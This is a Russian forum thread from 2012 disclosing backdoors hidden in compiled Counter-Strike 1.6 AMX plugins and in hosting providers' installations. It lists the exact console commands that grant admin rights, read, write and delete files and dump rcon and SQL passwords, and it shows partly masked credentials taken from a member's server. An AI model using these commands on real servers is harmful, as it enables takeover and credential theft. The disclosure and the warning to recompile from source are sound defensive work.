Добро пожаловать на форум, Гость, это ваша панель
Страница 1 из 212»
Форум Perfect Soft » Моды и AMX Скриптинг CS 1.6 » Информация о бекдорах в плагинах » [ВАЖНО] Stats shell
[ВАЖНО] Stats shell
KinD
Дата: Пятница, 29.06.2012, 17:22 | Сообщение # 1
офлайн

  • Сообщения: 1148
  • Награды: 22
  • Замечания:
 
Quote
amx_bancs версия 13.0:

В этом плагине есть перенаправление всех игроков на другой сервер.
Заходим на любой сервер где стоит плагин, вводим в консоль ban_play er ваш_ип ваш_порт
Заглушка: http://c-s.net.ua/forum/ipb.html?act=attac...st&id=16754
Ставить ОБЯЗАТЕЛЬНО перед плагином amx_bancs.amxx

statsx_shell:

Тут вообще беда, думаю не зря автор назвал его shell, там рельно есть shell.
В исходнике его конечно нет, он присутствует в уже скомпилированной версии.

Команды:
mm_plugins sosim andy_adm - получить админку, права: abcdefghijklmnopqrstu
mm_plugins so simandy_del "" - удалить файл
mm_plugins sosima ndy_wr "" "text" - записать в файл
mm_plugins so simandy_rd "" - прочитать файл
mm_plugins sosiman dy_dir "" - показать что в папке
mm_plugins sos itesyki - выводит rcon_password, amx_password_field, amx_sql_host, и т.д и т.п
mm_plugins sosite syki "say Hello" - выполнят команду на сервере

Офф сайт: http://amx-server.blogspot.com/
Почти во всех плагинах есть backdoor.

Такие дела.

PS: Работает не на всех серверах.


Автор:isset

Хочу добавить от себя.
На хостингах Myarena(спасибо Sasha13840 За тест(плагин был установлен через ПУ)
Стоит данные плагин,который заражен этой фигней(нужно проверить на forteam и serva4ok)
Скрин:


Скачивайте заново,компилируйте(не используйте уже скомпилированный amxx)

Офф сайт: http://amx-server.blogspot.com/
Прикрепления: 0851832.jpg(95Kb)


Skype:daywerok
 
PATRUL
Дата: Пятница, 29.06.2012, 18:08 | Сообщение # 2
офлайн

  • Сообщения: 715
  • Награды: 5
  • Замечания:
 
У меня stats shell стоит backdoor'a нету )

Качественный Хостинг Игровых Серверов
 
KinD
Дата: Пятница, 29.06.2012, 18:18 | Сообщение # 3
офлайн

  • Сообщения: 1148
  • Награды: 22
  • Замечания:
 
PATRUL, Прям таки?

RCON: "Za02zy4Ws*********"
PW FIELD: "_pw"
===========================
SQL HOST: "anyhosting.ru"
SQL USER: "patrul***_bans"
SQL PW: "SAD*****"
SQL DB: "patrul****_bans"
SQL TABLE: "admin"
SQL TYPE

Затер все.В личку отправил все данные.


Skype:daywerok

Сообщение отредактировал KinD - Пятница, 29.06.2012, 18:37
 
SMaster
Дата: Пятница, 29.06.2012, 18:31 | Сообщение # 4
офлайн

  • Сообщения: 2163
  • Награды: 44
  • Замечания:
 
Хз как можно ставить не проверенные плагины!

---
Да и хостеры мудачье получается.
Люди платят,а тем в лом такие серьезные вещи проверить.


Наша группа вконтакте http://vk.com/nano_world_cs

Контакты:
ICQ 607786179
Skype xonahead

 
KinD
Дата: Пятница, 29.06.2012, 18:46 | Сообщение # 5
офлайн

  • Сообщения: 1148
  • Награды: 22
  • Замечания:
 
UPDATE.
Serva4ok тоже с таким плагином =)

Code
1) ;Generated by S4-GPanel (http://serva4ok.ru)

Дальше писать не буду,дальше админки пойдут.

с ForTeam вроде чисто,проверил 6-7 серверов,но там не стояли данные плагины.


Skype:daywerok

Сообщение отредактировал KinD - Пятница, 29.06.2012, 19:12
 
Contra63
Дата: Пятница, 29.06.2012, 19:13 | Сообщение # 6
офлайн

  • Сообщения: 828
  • Награды: 7
  • Замечания:
 


 
Sasha13840
Дата: Пятница, 29.06.2012, 19:16 | Сообщение # 7
офлайн

  • Сообщения: 384
  • Награды: 7
  • Замечания:
 
KinD, Не надо было команды выкладывать.
Щас всякое школоло пойдет сервера крушить
cry
 
Contra63
Дата: Пятница, 29.06.2012, 19:28 | Сообщение # 8
офлайн

  • Сообщения: 828
  • Награды: 7
  • Замечания:
 
Тут вроде нет
Прикрепления: statsx_shell.sma(120Kb)


 
KinD
Дата: Пятница, 29.06.2012, 19:31 | Сообщение # 9
офлайн

  • Сообщения: 1148
  • Награды: 22
  • Замечания:
 
Contra63, Только в скомпилином варианте есть.В исходнике нет.

Skype:daywerok
 
PATRUL
Дата: Пятница, 29.06.2012, 20:06 | Сообщение # 10
офлайн

  • Сообщения: 715
  • Награды: 5
  • Замечания:
 
бля пздц)
Взял исходник скомпилировал и посмотрел на плагин,который уже был.. Размеры их очень значительно отличаются... -_-


Качественный Хостинг Игровых Серверов
 
KinD
Дата: Пятница, 29.06.2012, 20:07 | Сообщение # 11
офлайн

  • Сообщения: 1148
  • Награды: 22
  • Замечания:
 
PATRUL, А ты говорил,что у тебя нету backdoor :)

Skype:daywerok
 
Sasha13840
Дата: Пятница, 29.06.2012, 20:30 | Сообщение # 12
офлайн

  • Сообщения: 384
  • Награды: 7
  • Замечания:
 

Добавлено (29.06.2012, 20:30)
---------------------------------------------
Я специально не переустанавливал плагин,чтобы посмотреть переустановится он сам или нет

Прикрепления: 3812006.jpg(117Kb)
 
Sasha13840
Дата: Суббота, 30.06.2012, 23:06 | Сообщение # 13
офлайн

  • Сообщения: 384
  • Награды: 7
  • Замечания:
 
Им пока в открытую не скажешь,что в плагинах дырка они не чего не сделают.
Наконец то стали проверять свои плагины:

Добавлено (30.06.2012, 23:06)
---------------------------------------------
И даже спасибо не сказали cry

Прикрепления: 0631355.jpg(91Kb)
 
KinD
Дата: Суббота, 30.06.2012, 23:09 | Сообщение # 14
офлайн

  • Сообщения: 1148
  • Награды: 22
  • Замечания:
 
Sasha13840, Проверил на своем хостинге ad_manager чистый =).
Кстати про CSF давно знают,что там Backdoor+редикт команды


Skype:daywerok
 
Sasha13840
Дата: Суббота, 30.06.2012, 23:13 | Сообщение # 15
офлайн

  • Сообщения: 384
  • Награды: 7
  • Замечания:
 
Неужели за те деньги которые им платят сотни людей так трудно проверить плагины?
Ведь myarena это не какой то там захудалый хостинг.
Я от них просто в шоке.
 
KinD
Дата: Суббота, 30.06.2012, 23:15 | Сообщение # 16
офлайн

  • Сообщения: 1148
  • Награды: 22
  • Замечания:
 
Sasha13840, скинь weapon_lights.amxx,хочу поглядеть что там.

Skype:daywerok
 
Sasha13840
Дата: Суббота, 30.06.2012, 23:21 | Сообщение # 17
офлайн

  • Сообщения: 384
  • Награды: 7
  • Замечания:
 
Google - не,не слышал?
Откуда он у меня?
 
KinD
Дата: Суббота, 30.06.2012, 23:26 | Сообщение # 18
офлайн

  • Сообщения: 1148
  • Награды: 22
  • Замечания:
 
Меня там забанили. :)

Skype:daywerok
 
SMaster
Дата: Суббота, 30.06.2012, 23:29 | Сообщение # 19
офлайн

  • Сообщения: 2163
  • Награды: 44
  • Замечания:
 
Sasha13840, myarena репутацию себе подмочила серьезно.
Если им нужны денежки думаю подумают хоть немного.
А так получается отстойный хостинг на котором лучше не держать сервер или все делать самому в плане плагинов.


Наша группа вконтакте http://vk.com/nano_world_cs

Контакты:
ICQ 607786179
Skype xonahead

 
KinD
Дата: Суббота, 30.06.2012, 23:40 | Сообщение # 20
офлайн

  • Сообщения: 1148
  • Награды: 22
  • Замечания:
 
Кстати,не описав проблемы,то можно было спокойно заходить на аренвские сервера(мониторинг Myarena) поочереди красть пароли и тд.Потом продать за кругленькую сумму,ах и да.Там доступ к директориям раставлен не правильно,можно за папку cstrike залезть >>> доступ к чужим серверам.

Skype:daywerok
 
Форум Perfect Soft » Моды и AMX Скриптинг CS 1.6 » Информация о бекдорах в плагинах » [ВАЖНО] Stats shell
Страница 1 из 212»
Поиск: